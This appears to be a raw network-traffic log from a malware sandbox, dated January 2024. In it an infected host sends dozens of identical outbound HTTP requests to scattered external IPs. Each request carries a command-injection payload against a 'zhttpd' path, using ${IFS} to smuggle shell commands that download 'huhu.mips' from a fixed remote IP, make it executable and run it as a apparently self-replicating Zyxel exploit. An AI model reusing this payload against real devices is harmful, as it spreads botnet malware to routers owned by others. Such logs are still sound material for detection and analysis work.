                                              Jan 29, 2024 07:03:52.055151939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4999192.168.2.145027673.229.49.115443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.055165052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5000192.168.2.1452520171.59.8.106443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.058028936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5001192.168.2.145134250.81.250.80443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.058516979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5002192.168.2.144157689.243.58.219443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.058562040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5003192.168.2.145632264.197.32.12443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.058582067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5004192.168.2.145270035.62.81.165443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.058614969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5005192.168.2.1452568203.186.85.239443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.058646917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5006192.168.2.1453292220.91.89.86443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.058700085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5007192.168.2.1433036204.183.99.249443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.058743954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5008192.168.2.1447218212.39.73.158443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.058784008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5009192.168.2.1442842112.10.238.176443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.058825016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5010192.168.2.1441034138.68.211.7443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.058875084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5011192.168.2.1442682112.64.72.47443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.058911085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5012192.168.2.1449914102.69.201.53443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.058933973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5013192.168.2.1433526131.137.88.255443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.058963060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5014192.168.2.145777071.95.3.57443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.067187071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5015192.168.2.143684840.252.193.110443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.067226887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5016192.168.2.1436436107.7.254.2443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.067255020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5017192.168.2.145214869.205.12.102443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.067286968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5018192.168.2.1433876209.96.225.71443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.067322016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5019192.168.2.144163883.149.68.84443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.067364931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5020192.168.2.1441540137.130.204.239443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.067395926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5021192.168.2.146011299.234.48.159443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.067428112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5022192.168.2.1451998112.217.102.101443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.067495108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5023192.168.2.1437192197.209.131.126443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.067529917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5024192.168.2.143741252.244.129.129443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.067575932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5025192.168.2.143428473.108.104.249443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.067598104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5026192.168.2.1443118173.91.234.245443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.067634106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5027192.168.2.1437060218.37.13.46443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.067673922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5028192.168.2.145013292.214.30.184443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.067717075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5029192.168.2.143899270.208.58.160443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.067758083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5030192.168.2.144443418.255.30.85443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.067817926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5031192.168.2.1456462106.122.82.64443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.067854881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5032192.168.2.1440126151.101.187.58443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.067910910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5033192.168.2.144562279.183.15.228443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.067953110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5034192.168.2.1439590145.0.122.55443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.067997932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5035192.168.2.1455820213.7.246.19443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.068032980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5036192.168.2.1448178135.100.129.115443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.068068981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5037192.168.2.1456964222.41.50.184443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.068103075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5038192.168.2.144069213.210.228.82443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.068152905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5039192.168.2.1441878195.40.60.189443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.068191051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5040192.168.2.1436774194.153.177.92443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.068229914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5041192.168.2.1447610182.221.107.182443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.068269968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5042192.168.2.144743874.146.40.157443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.068300962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5043192.168.2.143876442.15.189.31443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.068332911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5044192.168.2.1441136162.48.183.22443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.068388939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5045192.168.2.144976440.236.151.178443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.068429947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5046192.168.2.1456236129.166.159.231443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.068453074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5047192.168.2.1451526181.223.47.219443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.068481922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5048192.168.2.143840847.137.146.169443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.068517923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5049192.168.2.145462683.54.9.28443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.068563938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5050192.168.2.143480838.141.171.120443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.068598032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5051192.168.2.1436536151.12.210.144443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.068612099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5052192.168.2.1459566107.163.116.165443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.068650007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5053192.168.2.145382820.112.134.150443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.068686008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5054192.168.2.144959283.105.158.1443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.068717957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5055192.168.2.1457816133.28.190.83443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.068769932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5056192.168.2.145279871.95.223.162443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.068813086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5057192.168.2.144112678.84.92.248443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.068841934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5058192.168.2.145692896.208.120.3443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.068876982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5059192.168.2.1454194180.234.243.188443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.068907976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5060192.168.2.14442181.223.252.194443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.068938971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5061192.168.2.1449510131.132.78.142443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.068984032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5062192.168.2.1437506136.37.169.29443
                                              TimestampBytes transferredDirectionData
